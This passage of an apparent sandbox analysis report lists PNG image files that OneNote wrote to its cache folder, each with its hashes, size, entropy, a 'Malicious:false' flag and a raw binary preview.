                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

